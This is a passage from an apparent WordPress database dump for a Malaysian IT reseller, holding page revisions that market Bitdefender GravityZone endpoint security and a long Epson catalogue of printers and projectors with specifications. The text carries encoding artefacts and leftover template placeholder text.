endpoint solutions protect your enterprise endpoints against ransomware.\r\n\r\n<img class=\"alignnone size-full wp-image-2414\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-elite-Copy.png\" alt=\"\" width=\"100\" height=\"100\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Elite Suite --Â </strong>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-2413\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-ultra-Copy.png\" alt=\"\" width=\"100\" height=\"100\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Security for Endpoints --Â </strong>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.</li>\r\n</ul>\r\n<span class=\"hidden-text\"><img class=\"alignnone size-full wp-image-2415\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bitdefender-gravityzone-enterprise-Copy.png\" alt=\"\" width=\"100\" height=\"100\" /></span>\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Advanced Business Security --Â </strong>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Bitdefender','','inherit','closed','closed','','1448-revision-v1','','','2018-12-18 19:59:04','2018-12-18 11:59:04','',1448,'https://bintara.com.my/blog/2018/12/18/1448-revision-v1/',0,'revision','',0),(2810,1,'2019-01-04 16:04:13','2019-01-04 08:04:13','<h3>Protect Your Endpoints with Layered Next-Gen Security, now with EDR</h3><h3>Itâ€™s Time to Rethink Endpoint Security<br />Protect Endpoints</h3><p>Organizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. Itâ€™s time to rethink endpoint security! <br />Bitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.</p>		\n			<h3>Product</h3>		\n		<p><strong>GravityZone Elite SuiteÂ </strong></p><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</p><p><strong>GravityZone Ultra SuiteÂ </strong></p><p>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.</p><p><strong>GravityZone Enterprise Security</strong></p><p>Bitdefenderâ€™s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.</p><h3>Protect all devices</h3><h4>Anti Ransomware</h4><p>Ransomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes â€“ so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.</p><h3 id=\"products\">Products</h3><p>All Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.</p><p><strong>GravityZone Elite SuiteÂ </strong></p><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</p><p><strong>GravityZone Security for Endpoints </strong></p><p>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.</p><p><strong>GravityZone Advanced Business Security </strong></p><p>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.</p><p>To discover more, please click the button below or contact us to discuss your needs.</p><p>[maxbutton id=\"1\" ]</p>','Bitdefender','','inherit','closed','closed','','1448-revision-v1','','','2019-01-04 16:04:13','2019-01-04 08:04:13','',1448,'https://bintara.com.my/blog/2019/01/04/1448-revision-v1/',0,'revision','',0),(2207,1,'2018-12-15 01:50:27','2018-12-14 17:50:27','<h2>Protect Your Endpoints with Layered Next-Gen Security, now with EDR</h2>\r\n<h3 class=\"title\">Itâ€™s Time to Rethink Endpoint Security</h3>\r\n<h3>Protect Endpoints</h3>\r\nOrganizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. Itâ€™s time to rethink endpoint security!Â <span class=\"hidden-text\">\r\nBitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.Â </span>\r\n<h2 id=\"products\" class=\"title-products\" style=\"text-align: left;\">Products</h2>\r\n<span class=\"hidden-text\">\r\n<img src=\"https://download.bitdefender.com/resources/themes/draco/images/bitdefender-gravityzone-elite.png\" alt=\"Next-gen layered endpoint protection\" /></span>\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Elite Suite</strong></li>\r\n</ul>\r\nLayered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.\r\n\r\n<img src=\"https://download.bitdefender.com/resources/themes/draco/images/bitdefender-gravityzone-ultra.png\" alt=\"EDR platform for corporate security\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Ultra Suite</strong></li>\r\n</ul>\r\nGravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.\r\n\r\n<img src=\"https://download.bitdefender.com/resources/themes/draco/images/bitdefender-gravityzone-enterprise.png\" alt=\"GravityZone EDR platform for enterprise security\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Enterprise Security</strong></li>\r\n</ul>\r\nBitdefenderâ€™s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.\r\n<h2 class=\"title\">Protect all devices</h2>\r\n<h3>Anti Ransomware</h3>\r\nRansomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes â€“ so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.\r\n<h2 id=\"products\" class=\"title-products\">Products</h2>\r\nAll Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.\r\n\r\n<img src=\"https://download.bitdefender.com/resources/themes/draco/images/business/anti-ransomware-solution-1.png\" alt=\"Bitdefender anti ransomware product for business -  GravityZone Elite Ultra\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Elite Suite</strong></li>\r\n</ul>\r\nLayered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.\r\n\r\n<img src=\"https://download.bitdefender.com/resources/themes/draco/images/business/anti-ransomware-solution-2.png\" alt=\"Bitdefender anti ransomware product for business - Bitdefender GravityZone Security for Endpoints\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Security for Endpoints</strong></li>\r\n</ul>\r\nSolution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.\r\n\r\n<span class=\"hidden-text\"><img src=\"https://download.bitdefender.com/resources/themes/draco/images/business/anti-ransomware-solution-3.png\" alt=\"Bitdefender Bitdefender anti ransomware product for business -  Advanced Business Security\" /></span>\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Advanced Business Security</strong></li>\r\n</ul>\r\nBundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Bitdefender','','inherit','closed','closed','','1448-revision-v1','','','2018-12-15 01:50:27','2018-12-14 17:50:27','',1448,'https://bintara.com.my/blog/2018/12/15/1448-revision-v1/',0,'revision','',0),(2208,1,'2018-12-15 01:53:16','2018-12-14 17:53:16','<h2>Protect Your Endpoints with Layered Next-Gen Security, now with EDR</h2>\r\n<h3 class=\"title\">Itâ€™s Time to Rethink Endpoint Security</h3>\r\n<h3>Protect Endpoints</h3>\r\nOrganizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. Itâ€™s time to rethink endpoint security!Â <span class=\"hidden-text\">\r\nBitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.Â </span>\r\n<h2 id=\"products\" class=\"title-products\" style=\"text-align: left;\">Products</h2>\r\n<span class=\"hidden-text\">\r\n<img src=\"https://download.bitdefender.com/resources/themes/draco/images/bitdefender-gravityzone-elite.png\" alt=\"Next-gen layered endpoint protection\" /></span>\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Elite Suite --Â </strong>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</li>\r\n</ul>\r\n<img src=\"https://download.bitdefender.com/resources/themes/draco/images/bitdefender-gravityzone-ultra.png\" alt=\"EDR platform for corporate security\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Ultra SuiteÂ  --Â </strong>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.</li>\r\n</ul>\r\n<img src=\"https://download.bitdefender.com/resources/themes/draco/images/bitdefender-gravityzone-enterprise.png\" alt=\"GravityZone EDR platform for enterprise security\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Enterprise Security --Â </strong>Bitdefenderâ€™s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.</li>\r\n</ul>\r\n<h2 class=\"title\">Protect all devices</h2>\r\n<h3>Anti Ransomware</h3>\r\nRansomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes â€“ so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.\r\n<h2 id=\"products\" class=\"title-products\">Products</h2>\r\nAll Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.\r\n\r\n<img src=\"https://download.bitdefender.com/resources/themes/draco/images/business/anti-ransomware-solution-1.png\" alt=\"Bitdefender anti ransomware product for business - GravityZone Elite Ultra\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Elite Suite --Â </strong>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.</li>\r\n</ul>\r\n<img src=\"https://download.bitdefender.com/resources/themes/draco/images/business/anti-ransomware-solution-2.png\" alt=\"Bitdefender anti ransomware product for business - Bitdefender GravityZone Security for Endpoints\" />\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Security for Endpoints --Â </strong>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.</li>\r\n</ul>\r\n<span class=\"hidden-text\"><img src=\"https://download.bitdefender.com/resources/themes/draco/images/business/anti-ransomware-solution-3.png\" alt=\"Bitdefender Bitdefender anti ransomware product for business - Advanced Business Security\" /></span>\r\n<ul>\r\n 	<li class=\"product-name\"><strong>GravityZone Advanced Business Security --Â </strong>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Bitdefender','','inherit','closed','closed','','1448-revision-v1','','','2018-12-15 01:53:16','2018-12-14 17:53:16','',1448,'https://bintara.com.my/blog/2018/12/15/1448-revision-v1/',0,'revision','',0),(2721,1,'2018-12-24 09:22:58','2018-12-24 01:22:58','','abbc0420f899426c86b9f547f8e0476d_g3010_01','','inherit','closed','closed','','abbc0420f899426c86b9f547f8e0476d_g3010_01','','','2018-12-24 09:22:58','2018-12-24 01:22:58','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png',0,'attachment','image/png',0),(2747,1,'2018-12-24 12:33:58','2018-12-24 04:33:58','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<p>Epson WorkForce Enterprise WF-C17590Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>2.Â Epson WorkForce Pro WF-C5290Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>3.Â Epson WorkForce WF-100Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>4.Â Epson WorkForce WF-7711Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>		\n			<h3>INK TANK SYSTEM</h3>		\n		<ol><li>Epson EcoTank L3150Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></li></ol><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><p>2.Â Epson L120 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul><p>3.Â Epson M1100 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul><ol><li>Epson AcuLaser C9300NÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></li></ol><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul><p>Â Epson WorkForce AL-M320DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul><p>Epson WorkForce AL-M8100DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>		\n			<h3>POS PRINTER</h3>		\n		<p>Epson TM-H6000IVÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><p>Epson TM-T88V-iÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul><p>Epson TM-T70IIÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>		\n			<h3>PHOTO PRINTER</h3>		\n		<p>Epson L1800 A3 Photo Ink Tank Printer</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul><p>Epson L850 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><p>Â </p><p>Epson L805 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p>Epson EB-2055<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><p>Epson EB-2142WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul><p>Epson EB-L500WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul><h3>ACCENT LIGHTING LASER PROJECTORS</h3><p>Epson LightScene EV-105<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"225\" height=\"150\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<ul><li>Â </li></ul><ul><li>Â </li></ul><h3>INK TANK SYSTEM</h3><ol><li>Â </li></ol><h3>LASER PRINTER</h3><ol><li>Â </li></ol><p>2.</p><p>3.Â </p><h3>POS PRINTER</h3><ol><li>Â </li></ol><ul><li>Â </li></ul><ul><li>Â </li></ul><h3>Â </h3><ul><li>Â </li></ul><p>2.Â 3.Â </p><h1>Projectors for Work</h1><p>Epson has the best projector for your business, from education solutions to conference room projectors.</p><h3>Â </h3><ul><li>Â </li></ul><ul><li>Â </li></ul><ul><li>Â </li></ul><h3>Â </h3><h3>ULTRA PORTABLE</h3><ol><li>Epson EB-1785WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></li></ol><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul><h3>INTERACTIVE</h3><ol><li>Epson EB-536WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></li></ol><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul><p>2.Â Epson 595Wi/585Wi/575WiÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul><h3>HIGH BRIGHTNESS</h3><ol><li>Epson EB-L1405UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></li></ol><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul><p>2.Â Epson EB-G7400UNLÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul><p>3.Â Epson EB-Z10000UÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection 